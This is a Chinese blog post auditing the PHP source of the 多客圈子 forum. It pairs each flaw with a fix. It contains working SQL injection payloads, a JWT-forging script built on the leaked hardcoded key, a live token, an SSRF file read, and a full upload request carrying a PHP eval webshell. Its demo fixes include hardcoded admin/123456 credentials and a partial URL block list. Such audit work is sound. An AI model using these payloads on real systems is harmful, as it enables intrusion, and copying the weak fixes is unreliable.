当前位置: 首页 > article >正文

多客圈子论坛代码审计(PHP代码审计)

前言前几天看到同学发来了一个漏洞分析的报告想着来分析分析源代码就有了这篇文章第一次写代码审计的文章可能会有很多不足点欢迎大家批评指正谢谢!项目源代码https://pan.quark.cn/s/416971141321本文参考https://mp.weixin.qq.com/s/Na_rqDW5B4V9ptRuwTk1Lw漏洞代码分析1.SQL注入Break代码定位代码位于后端PHP\app\api\controller\Index.php文件的305行开始参数 to_id、cate_id、tags_id 均存在注入点.注入参数1to_id代码含义这段代码的作用是根据用户IDto_id构建SQL查询条件用于筛选特定用户的数据。if (isset($param[to_id]) $param[to_id] 0) { $where user_id .$param[to_id]; }注入示例?to_id1%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),3)%20)--坑注意最后需要用 ) -- 进行闭合整个where语句注入参数2cate_id代码含义这段代码的作用是根据分类ID查询未置顶的商品并按特定规则排序。if (isset($param[cate_id]) $param[cate_id] 0) { $where cate_id .$param[cate_id]. AND is_ding 0; $order is_ding desc,id desc; }注入示例?cate_id1%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),3)%20)--注入参数3 tags_id代码含义根据传入的标签ID查询数据库中tags_ids字段包含该标签ID前后带逗号的记录。if (isset($param[tags_id]) $param[tags_id] 0) { $where tags_ids LIKE %,.$param[tags_id].,%; }注入示例1%27)%20and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--Fix修复方案1强制转换// 修复方法1 (强制转换) if(isset($param[to_id]) $param[to_id] 0) { // 强制转换为整数类型防止 SQL 注入这是关键的安全措施 $to_id (int)$param[to_id]; $where user_id .$to_id; }修复方案2参数化// 修复方法2 (thinkphp框架特性) if(isset($param[to_id]) $param[to_id] 0) $where [user_id $param[to_id]];其余注入点修复方案类似2.JWT硬编码代码位置\multi-social-master\后端PHP\config\jwt.php当key被泄露时利用该key可以生成JWT利用代码?php function base64url_encode($data) { return rtrim(strtr(base64_encode($data), /, -_), ); } $header [typ JWT, alg HS256]; $payload [uid 1]; $key 966285d811d508e0383235c457d79391; $segments [ base64url_encode(json_encode($header)), base64url_encode(json_encode($payload)) ]; $signature hash_hmac(sha256, implode(., $segments), $key, true); $segments[] base64url_encode($signature); $jwt implode(., $segments); echo $jwt;生成得到JWT利用该JWT后续可进行任意文件读取3.JWT泄露Break访问接口/api/login 可直接返回JWT利用JWT可进行未授权访问Fix漏洞代码位置\multi-social-master\后端PHP\app\admin\controller\Login.php 的 23行开始class Login extends Base { public $needLogin false; public function index() { $a [ a 1, b 2, c 3 ]; trace($a, dandan); try { $post Request::post(); $login_token Jwt::encode([ uid 1 ], Config::get(jwt.key)); return success([ login_token $login_token // 直接将JWT返回给客户端 ]); } catch (\Exception $exception) { return error($exception-getMessage(), $exception-getCode()); } } }修复代码身份认证注意这里只是演示修复方法实际方案需要利用登录接口进行数据库查询认证public function index() { $a [ a 1, b 2, c 3 ]; trace($a, dandan); try { $post Request::post(); // 获取用户输入的用户名和密码 $username $post[username] ?? ; $password $post[password] ?? ; // 验证用户名和密码是否正确这里需要根据实际数据库验证 // 示例假设正确的用户名是admin密码是123456 if ($username ! admin || $password ! 123456) { return error(用户名或密码错误, 401); } $login_token Jwt::encode([ uid 1 ], Config::get(jwt.key)); return success([ login_token $login_token // 直接将JWT返回给客户端 ]); } catch (\Exception $exception) { return error($exception-getMessage(), $exception-getCode()); } }4.SSRFBreak漏洞接口/api/user/httpGet?url利用漏洞需要加上Token,也就是 JWTeyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjF9.VQtQaEk7rvMOGHV5dBlNjWpWtBL-gFNpKBMNXTX3_ns漏洞利用:读取 win.iniFix漏洞代码路径\multi-social-master\PHP\app\api\controller\User.php 的663 行开始漏洞代码public function httpGet($url) { $curl curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_TIMEOUT, 500); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_URL, $url); $res curl_exec($curl); curl_close($curl); return $res; }修复代码字符过滤public function httpGet($url) { // 只能使用http/https,不能访问内网 if (!preg_match(/^https?:\/\/(?!localhost|127\.0\.0\.1|169\.254\.169\.254|10\.|172\.16\.|192\.168\.)/i, $url)) { echo hacker!; return false; } $curl curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_TIMEOUT, 500); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_URL, $url); $res curl_exec($curl); curl_close($curl); return $res; }再次读取失败5.文件上传漏洞Break漏洞接口/index.php/api/User/up_img漏洞利用POST /admin/upload_files/upload.html?water0 HTTP/1.1 Host: 192.168.119.53 Content-Length: 754 Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Accept: */* Origin: http://192.168.119.53 Referer: http://192.168.119.53/admin/Adinfo/edit.html?id39 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.9 Cookie: thinkphp_show_page_trace0|0; PHPSESSIDfac2eb23b504f43ebdcf8e7e46b41053 Connection: keep-alive ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Content-Disposition: form-data; nameid WU_FILE_0 ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Content-Disposition: form-data; namename a.png ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Content-Disposition: form-data; nametype image/png ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Content-Disposition: form-data; namelastModifiedDate Sat Apr 18 2026 16:55:49 GMT0800 (新加坡标准时间) ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Content-Disposition: form-data; namesize 29 ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9 Content-Disposition: form-data; namefile; filenamea.php Content-Type: image/png ?php eval($_REQUEST[a]);? ------WebKitFormBoundaryTAO5TrZJ5u7GDNw9--上传成功拼接路径访问并执行命令Fix代码位置\multi-social-master\PHP\app\common\model\UploadFiles.php 的 55行开始漏洞代码public function upload($folder_namefiles,$app1) { try { $param request()-param(); $file request()-file(file); //文件后缀名 $ext $file-getOriginalExtension(); //配置信息 $config xn_cfg(upload); //存储类型 $storage $config[storage]; $isImage 1; //图片水印处理 if (isset($param[water])) { if( in_array( strtolower($ext), [png,jpg,jpeg,gif,bmp] ) ) { if( self::setWater($file,$param[water]) false ) { return [code0,msg水印配置有误]; } } }修复代码白名单public function upload($folder_namefiles,$app1) { try { $param request()-param(); $file request()-file(file); //文件后缀名 $ext strtolower($file-getOriginalExtension()); $allowedExts [ avi, // 微软视频格式 wmv, // Windows Media Video mpeg, // MPEG视频 mp4, // MP4视频最常见 m4v, // iTunes视频格式 mov, // QuickTime视频 asf, // 高级流格式 flv, // Flash视频 f4v, // Flash MP4视频 rmvb, // RealMedia可变比特率 rm, // RealMedia 3gp, // 手机视频格式 vob, // DVD视频对象 png, jpeg, webp, gif, mpeg, jpg ]; // 白名单上传文件 if(!in_array($ext, $allowedExts)){ return [code 0, msg 不支持的文件扩展]; } //配置信息 $config xn_cfg(upload); //存储类型 $storage $config[storage]; $isImage 1; //图片水印处理 if (isset($param[water])) { if( in_array( strtolower($ext), [png,jpg,jpeg,gif,bmp] ) ) { if( self::setWater($file,$param[water]) false ) { return [code0,msg水印配置有误]; } } }再次尝试上传需要注意上面仅仅演示了一个上传点分析代码发现有许多上传点。

相关文章:

多客圈子论坛代码审计(PHP代码审计)

前言:前几天看到同学发来了一个漏洞分析的报告,想着来分析分析源代码,就有了这篇文章,第一次写代码审计的文章,可能会有很多不足点,欢迎大家批评指正,谢谢! 项目源代码:https://pan…...

从专项到性能:APP质量保障实战指南与SoloPi工具深度解析

1. APP质量保障的核心逻辑 刚入行做移动测试那会儿,我总以为功能测试就是点点按钮。直到有次上线后用户集体投诉APP卡死,才明白质量保障远不止表面功能验证。真正专业的测试工程师,需要建立从专项到性能的完整质量评估体系。 APP质量保障本质…...

STM32F103驱动AD9959 DDS信号发生器:从CubeMX引脚配置到四通道频率调节实战

STM32F103驱动AD9959 DDS信号发生器实战指南 在电子设计竞赛和嵌入式系统开发中,DDS(直接数字频率合成)技术因其高精度、快速频率切换和相位可编程等优势,成为信号发生器设计的首选方案。AD9959作为一款四通道DDS芯片,…...

Mac新手必看:保姆级Git+SourceTree配置指南,从安装到拉取代码一气呵成

Mac新手必看:保姆级GitSourceTree配置指南,从安装到拉取代码一气呵成 刚接触开发的Mac用户,面对Git命令行操作往往一头雾水。SourceTree作为图形化工具能大幅降低学习门槛,但初始配置过程仍可能让新手手足无措。本文将用最直观的方…...

手把手教你用FS8A15S8设计小风扇:从电路图到实现多档升压(5.5V/6.8V/8V)

基于FS8A15S8的智能小风扇开发实战:多档升压与安全保护全解析 在创客社区和嵌入式开发领域,小型便携设备的电源管理一直是热门话题。最近一年,支持多档位电压输出的手持小风扇方案在DIY爱好者中特别流行——不仅因为其实用性,更因…...

MongoPlus 教程

一、MongoPlus 简介MongoPlus 是一个基于 MyBatis-Plus 思想设计的 MongoDB ORM 框架,提供了类似 MyBatis-Plus 的便捷操作体验。⚠️ 注意:MyBatis-Plus 本身是针对关系型数据库(MySQL、PostgreSQL等)的增强工具,并不…...

Substance 3D Painter Pt 2025 v11.0.1详细图文安装教程

软件简介:Substance 3D Painter(简称 Pt/SP)是 Adobe 推出的专业 3D 材质与纹理绘制软件,主要面向游戏、影视动画、产品渲染等行业,负责给 3D 模型制作真实感表面效果,比如金属、布料、划痕、锈迹、磨损等质…...

别再只会用‘w‘和‘r‘了!Matlab fopen函数权限参数全解析(含编码与字节序)

别再只会用w和r了!Matlab fopen函数权限参数全解析(含编码与字节序) 在Matlab文件操作中,fopen函数就像一把瑞士军刀——大多数人只使用最基本的"开瓶器"功能(r和w模式),却忽略了它真…...

还在用简单 AI 对话?Spring AI 自定义工具 + MCP 协议直接打通外部服务!

前言 本文的示例基于上一篇博客Spring AI 对话记忆不丢失!MySQL 主存 Redis 缓存实战(免费模型调用附源码)-CSDN博客的 已有项目继续开发 。如果你对项目结构、基础配置(ChatClient、ChatMemory、双写策略等)不清晰&…...

从零训练一个小模型-nanoGPT 模型训练 (一)数据预处理

最近在学习模型训练,实际上在大模型训练上,我并没有深厚的背景,通过视频课程和b站上的一些分享,开始入门。 由于我非神经网络这些相关的专业,所以想把自己学习的过程和经验总结记录下来,一方面自己可以巩固…...

C++数据结构--回溯算法

一.什么是回溯算法算法思想:在包含问题的所有解的解空间树中,按照深度优先搜索的策略,从根节点出发深度搜索解空间树。当搜索到某一节点时,要先判断该节点是否包含问题的解;如果包含就从该节点出发继续深度搜索下去,否则逐层向上回溯。一般在搜索的过程中都会添加相应的剪枝函数…...

【流量分析】Wireshark v4.6.4

简介 Wireshark 是一款非常棒的Unix和Windows上的开源网络协议分析器。它可以实时检测网络通讯数据,也可以检测其抓取的网络通讯数据快照文件。可以通过图形界面浏览这些数据,可以查看网络通讯数据包中每一层的详细内容。Wireshark拥有许多强大的特性&a…...

AI专题学习笔记

token 提示词:零样本、少样本、链式思考、自动思维链、自我一致性、思维树(走迷宫)、 RAG(肯德基最新汉堡的口味)、Fine-tuning(7年时间学医):用于提高语音模型在特定任务上的性能 向量:embedding 向量相似度计算:欧式距离、余弦相…...

go语言学习(分支语句与循环语句)

判断语句if 标准if语句 输入年龄&#xff0c;程序根据年龄判断状态&#xff1a; 未出生&#xff1a;age < 0儿童&#xff1a;age < 18成年人&#xff1a;age < 30中年人&#xff1a;age < 50老年人&#xff1a;age > 50 package mainimport "fmt"func…...

Markdown图片排版救星:5分钟搞定自适应大小和响应式布局(附CSS片段)

Markdown图片排版救星&#xff1a;5分钟搞定自适应大小和响应式布局&#xff08;附CSS片段&#xff09; 在技术写作的世界里&#xff0c;Markdown因其简洁高效而备受青睐。但当我们试图在Markdown文档中插入图片时&#xff0c;往往会遇到一个尴尬的现实&#xff1a;默认的图片处…...

为什么传统预警系统仍滞后12分钟?AGI动态权重学习算法,让山洪预警准确率跃升至99.17%——SITS2026核心团队实测数据

第一章&#xff1a;SITS2026专家&#xff1a;AGI与灾害预警 2026奇点智能技术大会(https://ml-summit.org) 在SITS2026大会上&#xff0c;来自全球气候建模中心、神经符号AI实验室及联合国减灾署&#xff08;UNDRR&#xff09;的联合研究团队展示了首个具备自主推理能力的灾害…...

3060台式机 Ubuntu 双系统部署 LingBot-Map 完整指南

3060台式机 Ubuntu 双系统部署 LingBot-Map 完整指南 第一章 绪论 1.1 项目背景 LingBot-Map 是由蚂蚁灵波科技(Robbyant)团队开源的一个前馈式 3D 基础模型,专为流式(Streaming)3D 场景重建而设计。它摒弃了传统 SLAM 或 NeRF 需要复杂迭代优化的范式,采用纯 Transfo…...

云端全自动AI漫剧生成工作流:从模型选型到完整实现

云端全自动AI漫剧生成工作流:从模型选型到完整实现 一、绪论 1.1 漫剧产业的AI化浪潮 漫剧作为“文字故事+静态漫画+动态效果”的新型内容形态,凭借低制作成本、高传播效率的优势,正迅速成为短视频平台的流量新风口。然而,传统漫剧生产流程高度依赖人工协作——从剧本改…...

LeetCodeHot100 2. 两数相加 思路JavaScript版本代码

题目思路以题目提供的例子为例来进行思考分别将两个数倒过来计算&#xff0c;类似如图,结合链表其实非常方便。创建一个新的虚拟链表newlist存储计算结果&#xff0c;tail指向该链表的末尾。首先计算l1和l2的首位&#xff0c;25 7&#xff0c;更新newlist的tail的值为7&#x…...

【AGI物流落地倒计时】:为什么2026年Q2成为企业接入自主决策物流AI的最后窗口期?

第一章&#xff1a;2026奇点智能技术大会&#xff1a;AGI与物流管理 2026奇点智能技术大会(https://ml-summit.org) AGI驱动的动态物流决策中枢 在2026奇点智能技术大会上&#xff0c;多家头部物流企业联合发布了基于自主推理架构&#xff08;Autonomous Reasoning Architect…...

客户反馈闭环体系怎么搭?6 个模块讲透流程设计思路

很多企业并不缺客户反馈&#xff0c;真正缺的是一条能跑通的闭环链路。客服在记&#xff0c;销售在提&#xff0c;客户成功在跟&#xff0c;产品也在收&#xff0c;但信息一旦分散&#xff0c;后面就很容易断掉&#xff1a;有人收&#xff0c;没人判&#xff1b;有人判&#xf…...

【2026奇点大会权威解码】:AGI突破临界点的5大认知科学证据与产业落地时间表

第一章&#xff1a;2026奇点智能技术大会&#xff1a;AGI与认知科学 2026奇点智能技术大会(https://ml-summit.org) 本届大会首次设立“AGI-Neuro Interface”联合实验室展台&#xff0c;聚焦大语言模型与人类工作记忆建模的交叉验证。来自MIT McGovern研究所与DeepMind联合团…...

FastAPI 项目 PyInstaller 打包 exe 全踩坑根治教程(Windows 全电脑通用分发)

文章前言本文基于FastAPISQLite 本地数据库项目&#xff0c;完整讲解如何将 Python 后端项目打包为独立 exe 可执行文件&#xff0c;实现任意 Windows 电脑无需安装 Python、无需配置环境、双击直接运行。全程收录打包过程中所有经典报错&#xff1a;isatty终端日志崩溃、WinEr…...

AI Agent Harness Engineering 的部署架构:单体部署、分布式部署与混合云

AI Agent Harness Engineering 的部署架构:单体部署、分布式部署与混合云 1. 标题 (Title) 以下是精心设计的5个标题选项,覆盖技术硬核、实践场景、读者收益等核心维度: AI Agent Harness 深度部署指南:从单体原型到混合云生产级落地全链路 拥抱 Agent 革命:单体/分布式/…...

认知几何学:思维的几何革命与跨学科价值研究

认知几何学&#xff1a;思维的几何革命与跨学科价值研究作者&#xff1a;方见华 单位&#xff1a;世毫九实验室 引言 在人类认知研究的漫长历程中&#xff0c;从莱布尼兹1679年提出"思维几何学"设想以来&#xff0c;认知科学经历了符号主义、联结主义、具身认知等多个…...

鲜枣去核机(论文 CAD图纸)

鲜枣去核作业长期依赖人工操作&#xff0c;不仅效率低下&#xff0c;还易因操作疲劳导致果肉损伤&#xff0c;影响产品品质。鲜枣去核机的出现&#xff0c;为这一环节提供了高效解决方案。其核心作用在于通过机械结构精准定位枣核位置&#xff0c;利用特定刀具快速分离果核与果…...

易语言实现圆弧长度计算

在易语言中计算圆弧长度&#xff0c;尤其是基于凸度&#xff08;Bulge&#xff09;和端点坐标的实现&#xff0c;需要将几何公式转换为具体的代码逻辑。以下是针对不同已知条件的详细实现方法&#xff0c;特别是凸度与端点场景。 一、 核心几何公式与易语言实现基础 圆弧长度…...

鲜枣去核机的设计【红枣去核机】论文 CAD图纸 SW三维图 开题报告 任务书……大枣红枣冬枣鲜枣去核机

鲜枣去核是红枣深加工中的关键环节&#xff0c;传统手工去核效率低、成本高&#xff0c;且难以保证果肉完整度。针对这一痛点&#xff0c;鲜枣去核机的设计聚焦于机械结构优化与加工精度提升&#xff0c;通过模块化设计实现去核、分选、收集一体化操作。其核心作用在于替代人工…...

圆弧长度计算公式详解

圆弧长度的计算核心在于其几何定义&#xff1a;圆弧是圆周的一部分&#xff0c;其长度由圆的半径和该圆弧所对应的圆心角决定。 一、 基本计算公式 圆弧长度 L 的计算公式为&#xff1a; L (θ / 360) 2πR (θ / 180) πR 或者&#xff0c;当圆心角 θ 以弧度制表示时…...

频谱分析仪

基本样式 在最上面会显示工作频率如&#xff1a;三步法 测量433MHz信号 1.点击Fre 2.点击Center Frequency 3.输入要测量信号的频率 4.点击Span 测量扫宽 可以设置10MHz 5.设置频谱仪Y轴显示 6.点击Amplitude 再点击Ref Level&#xff08;Y轴最高参考线 对应的幅度&#xff09;…...